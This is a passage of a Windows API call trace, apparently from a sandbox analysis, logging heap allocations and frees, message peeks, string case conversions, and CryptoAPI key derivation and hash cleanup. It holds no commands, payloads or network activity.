0x24b6c60 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.998] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.998] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.998] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.999] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.999] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.999] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.999] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0261.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.002] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.003] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.003] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.005] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.005] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.005] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.006] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.006] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.008] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0262.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.008] CryptDestroyHash (hHash=0xaa5760) returned 1 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: 